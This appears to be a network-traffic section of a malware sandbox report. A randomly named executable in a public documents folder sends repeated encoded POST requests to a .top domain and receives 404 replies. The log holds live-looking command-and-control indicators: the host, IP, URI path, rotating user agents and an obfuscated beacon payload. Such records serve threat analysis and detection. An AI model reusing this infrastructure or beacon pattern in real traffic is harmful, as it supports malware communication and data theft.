Dec 22, 2024 15:43:58.736679077 CET	344	OUT	Data Raw: 00 04 01 07 03 0d 01 0a 05 06 02 01 02 03 01 0b 00 07 05 0f 02 03 03 0a 07 06 0f 02 04 04 00 04 0e 07 03 0e 00 03 06 00 0b 0a 04 01 05 01 07 02 03 05 0b 08 0a 0e 05 0b 05 00 03 00 06 06 07 5d 03 53 0a 0e 00 02 01 07 0c 0e 0c 0f 0c 0d 0b 00 06 00 Data Ascii: ]S[R\L}UhY}_cbiueRBhRj_w\|h\|p\|xocKz`~hmQQtgZ~O~V@z}f~Ly
Dec 22, 2024 15:43:59.658035994 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:43:59.891813993 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:43:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49851	37.44.238.250	80	5164	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:44:09.569848061 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:44:09.924226046 CET	344	OUT	Data Raw: 05 05 01 05 06 00 04 05 05 06 02 01 02 03 01 04 00 03 05 0e 02 04 03 0a 07 00 0e 54 05 57 02 08 0e 02 04 00 02 06 06 00 0e 50 07 53 05 53 05 55 05 00 0c 0f 0e 07 04 52 04 52 06 02 07 00 05 5b 03 53 0d 0f 06 0f 04 55 0e 50 0c 53 0f 53 0b 01 07 04 Data Ascii: TWPSSURR[SUPSSSW\L}Q~`rwqu\`\|\|b^tRxLksk_xcxYy^h}oRvwpLju~V@{Cv}ry
Dec 22, 2024 15:44:10.850394011 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:44:11.075510979 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:44:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49877	37.44.238.250	80	6316	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:44:20.893887043 CET	313	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:44:21.252563953 CET	344	OUT	Data Raw: 00 00 04 00 06 0c 01 01 05 06 02 01 02 02 01 02 00 01 05 09 02 01 03 08 02 05 0a 05 04 55 01 54 0f 06 06 5e 01 01 05 03 0b 07 06 00 05 03 07 0f 04 07 0c 5c 0e 06 07 03 06 0e 04 02 06 01 05 5d 00 06 0e 00 07 56 04 52 0e 52 0f 01 0c 0d 0f 05 04 03 Data Ascii: UT^\]VRR[VRU\L}PN}\wriLa[U\|Bi`R`B\|pkZoB]K{`v}m^CvdtiO~V@xm~N~bq
Dec 22, 2024 15:44:22.169946909 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:44:22.403672934 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:44:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49912	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:44:34.596466064 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:44:34.956576109 CET	344	OUT	Data Raw: 00 03 04 00 06 0b 01 01 05 06 02 01 02 07 01 0b 00 04 05 0f 02 06 03 09 00 0f 0f 00 04 54 00 03 0d 05 03 09 02 53 07 00 0c 03 05 04 07 0a 07 02 06 53 0b 0c 0d 01 05 06 07 0f 05 03 05 05 04 08 05 06 0e 08 07 06 06 03 0c 57 0d 00 0d 06 0f 09 06 00 Data Ascii: TSSW]UW\L}RhYy\c\[weZ~lf^coX\|]s^xBZ[{pPklAcwc\iO~V@Az}T}\u
Dec 22, 2024 15:44:35.866362095 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:44:36.100238085 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:44:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49931	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:44:43.669979095 CET	301	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 228472cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:44:44.018359900 CET	336	OUT	Data Raw: 05 01 04 02 03 08 01 04 05 06 02 01 02 05 01 00 00 05 05 00 02 0d 03 0e 02 52 0d 0c 05 0f 03 03 0a 0f 03 01 01 01 06 06 0e 01 02 0a 04 06 05 02 04 50 0e 5c 0a 05 06 0b 04 00 06 0d 06 0a 04 58 02 04 0a 0d 05 51 06 54 0c 53 0f 07 0f 57 0e 54 07 0d Data Ascii: RP\XQTSWT[T\L}Pk`zOcaqBaKZB\|\|f]co`L\|shJ{\|gxpr}}ttgh~e~V@B{SP~_y
Dec 22, 2024 15:44:44.941432953 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:44:45.176815033 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:44:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49953	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:44:52.473998070 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:44:52.830962896 CET	344	OUT	Data Raw: 05 06 04 06 06 0c 04 00 05 06 02 01 02 0c 01 0b 00 07 05 0d 02 01 03 0d 03 02 0e 0c 07 02 01 02 0d 05 04 59 00 51 06 56 0b 06 07 07 07 51 07 04 04 07 0b 08 0f 57 07 03 06 07 03 03 06 52 07 0b 01 05 0d 09 04 02 04 55 0f 07 0b 05 0f 02 0c 09 07 57 Data Ascii: YQVQWRUWQTW\L}Rk`XwqBwulhBSL`UhLk]`KyolNvSZCvg\|je~V@z}f~be
Dec 22, 2024 15:44:53.744899035 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:44:53.979979992 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:44:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49975	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:45:01.292690039 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:45:01.643543959 CET	344	OUT	Data Raw: 05 00 04 05 06 0e 01 00 05 06 02 01 02 00 01 06 00 01 05 0f 02 05 03 0e 02 01 0f 0d 06 57 03 54 0d 06 06 00 02 50 03 04 0b 07 02 07 06 0b 05 51 06 54 0b 0e 0f 52 04 57 04 07 06 0d 06 51 07 5b 01 01 0c 09 00 03 06 53 0e 57 0b 03 0d 50 0b 08 04 07 Data Ascii: WTPQTRWQ[SWPXRV\L~\|^e\c\bXb[xhBeLtlt\|]sYx\|x^zpXTcStgw_i_~V@{m~}bi
Dec 22, 2024 15:45:02.564275980 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:45:02.800220013 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:45:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49995	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:45:10.035439968 CET	313	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:45:10.393688917 CET	344	OUT	Data Raw: 05 01 04 05 06 0b 04 00 05 06 02 01 02 04 01 02 00 03 05 08 02 04 03 01 01 06 0a 0d 03 03 01 05 0c 06 06 5b 07 05 04 55 0f 03 05 01 07 57 04 00 04 50 0e 0b 0d 50 07 07 07 06 03 03 01 04 07 58 05 07 0e 09 00 02 05 05 0f 02 0f 02 0d 07 0e 09 07 07 Data Ascii: [UWPPXPYZP\L~~`rcq~YbflRyvoh~cc_oRdYz`[YS\|@cgtu~V@@xmvA}r[
Dec 22, 2024 15:45:11.306257963 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:45:11.540150881 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:45:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	50017	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:45:23.656759977 CET	349	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:45:24.003226995 CET	344	OUT	Data Raw: 05 00 04 03 06 01 01 0b 05 06 02 01 02 0d 01 07 00 02 05 0f 02 05 03 08 07 0f 0f 02 05 0f 00 06 0d 01 06 0a 02 01 04 07 0e 56 06 05 05 03 02 01 06 06 0d 09 0a 07 01 00 05 06 06 0d 06 02 07 5c 05 02 0d 0e 05 54 07 01 0e 57 0e 02 0d 07 0f 00 05 03 Data Ascii: V\TWPU\L~N\|c~`[mBvKp~lucRpO]`Ky\|ZXl`q^~pNw^hN}_~V@{}r}bq
Dec 22, 2024 15:45:24.927016973 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:45:25.160655022 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:45:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	50018	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:45:32.905682087 CET	301	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:45:33.253392935 CET	344	OUT	Data Raw: 05 02 01 00 06 0a 01 07 05 06 02 01 02 0d 01 03 00 05 05 00 02 00 03 0b 07 04 0c 06 06 03 02 08 0c 06 03 0b 01 0d 04 0a 0e 51 07 00 06 01 04 02 07 02 0d 00 0e 07 05 0a 01 07 06 0d 07 04 05 0d 01 0a 0d 09 04 06 07 06 0d 07 0d 04 0f 03 0b 03 04 06 Data Ascii: QTWWR\L}S~py[ca~_vv\|f\`o\|ks[oBo{^uXkmRcYx}_~V@x}n~r}
Dec 22, 2024 15:45:34.177478075 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:45:34.412735939 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:45:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	50019	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:45:41.662519932 CET	301	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 228472cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:45:42.019006968 CET	336	OUT	Data Raw: 05 01 04 02 03 08 01 04 05 06 02 01 02 05 01 00 00 05 05 00 02 0d 03 0e 02 52 0d 0c 05 0f 03 03 0a 0f 03 01 01 01 06 06 0e 01 02 0a 04 06 05 02 04 50 0e 5c 0a 05 06 0b 04 00 06 0d 06 0a 04 58 02 04 0a 0d 05 51 06 54 0c 53 0f 07 0f 57 0e 54 07 0d Data Ascii: RP\XQTSWT[T\L}Pk`zOcaqBaKZB\|\|f]co`L\|shJ{\|gxpr}}ttgh~e~V@B{SP~_y
Dec 22, 2024 15:45:42.935374022 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:45:43.172420025 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:45:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	50020	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:45:51.007438898 CET	348	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
